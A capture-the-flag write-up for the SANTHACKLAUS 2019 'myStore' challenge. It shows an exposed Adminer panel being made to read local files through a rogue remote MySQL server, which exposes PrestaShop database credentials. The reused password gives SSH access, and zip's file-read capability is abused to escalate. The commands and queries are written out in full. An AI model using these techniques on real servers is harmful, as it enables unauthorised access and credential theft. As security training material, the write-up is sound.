[ Home ] [ Writeups ] [ Papers ] [ Cheatsheet ] [ About ]


.:: myStore - SANTHACKLAUS CTF 2019 ::.
Title : myStore - SANTHACKLAUS CTF 2019
Author : Cabir  
Date : Sunday, Oct 25, 2020
Modified : Sunday, Oct 25, 2020
Reading time: 3 minutes and 55 seconds.

.: DESCRIPTION :.

One of your friend wants to launch his online shop at https://mystore.santhacklaus.xyz. You quickly briefed him on the basic principles of IT security and he ensures you that he has followed all your advice. Conduct your audit and show him that its platform is not properly secured !


-=[CVE use to access remote db from a bad Adminer]=-

First nmap this webapp:

1$ sudo  nmap -Pn -v -p- -oN nmap2.log 46.30.204.42                 
2        Discovered open port 8080/tcp on 46.30.204.42
3        Discovered open port 22/tcp on 46.30.204.42
4        Discovered open port 443/tcp on 46.30.204.42
5        Discovered open port 80/tcp on 46.30.204.42
6        (yes my output sucks, I forgot to save it)

Even though I spent a lot of hours on fuzzing URLS and testing CVE on Prestashop it didn’t lead me anywhere. I switched from dirb to dirsearch and then magic happened.

1python3 dirsearch/dirsearch.py -u https://mystore.santhacklaus.xyz/ -e php --plain-text-report=dirsearch_app.log
2    
3    Here are results we have:
4    200     4KB  https://mystore.santhacklaus.xyz:443/adminer.php
5    200   306KB  https://mystore.santhacklaus.xyz:443/composer.lock
6    200    47KB  https://mystore.santhacklaus.xyz:443/index.php
7    200     3KB  https://mystore.santhacklaus.xyz:443/robots.txt

Adminer is a PHP administration tool which users can host on their web sites to enable them to remotely administer MySQL databases. Unfortunately, many web sites leave Adminer publicly accessible, meaning attackers can attempt to log into victim’s database’s using this tool. Here is https://mystore.santhacklaus.xyz:443/adminer.php :

Adminer is in version 4.6.2.

This version is prone to multiple vulnerabilities such as this one : https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

1.Adminer permits to connect to a remote MYSQL server (not restricted to local databases)

2.From the SQLConsole in Adminer, we can import and read files stored in the local database

3.Then we stole the credentials from the sensitive files we read, to connect to the local database directly.

To do that, I used this free MySQL online provider: https://remotemysql.com/ After your account created, you receive an email with your credentials:

 1Hi
 2
 3        Your account number is: 381264
 4        
 5        Your new database is now ready to use.
 6        
 7        To connect to your database use these details
 8        
 9        Server: sql7.freemysqlhosting.net
10        Name: sql7363454
11        Username: sql7363454
12        Password: ************
13        Port number: 3306

With these credentials, I connected on the Adminer panel.

Then here we are:

From the previous website i linked you, we have these request:

1load data local infile 'app/etc/local.xml' into table test.xml fields terminated by "\n"  

In this example we read ‘app/etc/local.xml’ from the local MYSQL and store it in test.xml. But i encountered many errors:

 1Error in query (1148): The used command is not allowed with this MySQL version 
 2    
 3    SHOW VARIABLES LIKE 'local_infile';
 4    
 5    Variable_name	Value
 6    local_infile	OFF
 7    
 8    SET GLOBAL local_infile = 1;
 9    
10    Error in query (1227): Access denied; you need (at least one of) the SUPER or 
11    SYSTEM_VARIABLES_ADMIN privilege(s) for this operation

All this error were because the MYSQL host on remotemysql.com was in version 8, and we can’t use the “load data” command. So I tried an other MYSQL Remote Server: freemysqlhosting.net That one was in MYSQL 5. So, good news, “load data” WORKS !

Then I read “/etc/passwd”

load data local infile ‘/etc/passwd’ into table whitepapers fields terminated by “\n” Here it is:

 1daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 2sync:x:4:65534:sync:/bin:/bin/sync
 3lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 4uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 5backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 6gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 7systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
 8_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
 9dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
10sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
11john:x:1001:1001:,,,:/home

User john seems interesting After reading all Prestashop forums, and all Prestashop’s code on github, I found the “app/config/parameters.php” file. This is where are stored database credentials in Prestashop.

1 load data local infile 'app/config/parameters.php' into table whitepapers fields terminated by "\n"  

Here it is:

 1 'parameters' => 
 2        'database_port' => '',
 3        'database_password' => 'KA6$g@Tx0{(Si4bR3DT4',
 4        'mailer_transport' => 'smtp',
 5        'mailer_password' => NULL,
 6        'ps_cache_enable' => false,
 7        'cookie_key' => 'fgEckT9sZEACDaiAfoaYz0X2A89xgskcStbCP9KJx1brOsT1uNc9sxs9',
 8        ),
 9        Set parameters here that may be different on each deployment target
10        e.g. development, ...
11        database_host:     127.0.0.1
12        database_user:     root
13        database_engine: InnoDB

From here we connect ourself to the database.

We can see everything in the database, such as clients email and password. At this point, what we all do is to search in all tables something interesting. I won’t explain you the long hours I needed to remember this: I had launched an nmap. SSH port is OPEN. Maybe john is an assh*** and he reused the same password on the SSH. He did it…

1$ ssh john@46.30.204.42 
2$ cat flag.txt 
3
4FLAG IS: SANTA{That-W4Z/a/C0ol-CV3!}  

-=[PART 2 - TL;DR - Deilyora]=-

Privilege escalation with linux capabilities

Now the next flag.txt is in /home/admin/flag.txt. Logged as user john, we don’t have the permission to read it. Let’s go for a privesc ! To begin we fired off lse.sh, an automated privesc scanner. Something interesting was returned to us:

1$ wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" \ -O lse.sh;chmod 700 lse.sh ; 
2./lse.sh -l 1 [...] 
3[*] sec010 List files with capabilities.................................... 
4
5yes! --- /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/zip = cap_dac_read_search+ep --- [...]  

To get the same result with a bash command, we can use getcap:

1 $ getcap -r / 2>/dev/null /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/zip = cap_dac_read_search+ep  

Source: https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 According to the article, if tar command has cap_dac_read_search+ep, we can have read access to anything. We don’t have these capabilities on the tar command, but we have it on zip. Let’s do it with the zip command.

1 $ zip flag.zip /home/admin/flag.txt 
2        adding: home/admin/flag.txt (stored 0%)  

It seems to work. We can now try to unzip and cat the flag.

1unzip flag.zip Archive: flag.zip 
2        extracting: home/admin/flag.txt 
3cat home/admin/flag.txt 
4
5SANTA{4lWayZ-cH3cK-C4paBiliT13s}

It worked !

.: FLAG :.

PART1: SANTA{That-W4Z/a/C0ol-CV3!} PART2: SANTA{4lWayZ-cH3cK-C4paBiliT13s}

[ Home ] [ Writeups ] [ Papers ] [ Cheatsheet ] [ About ]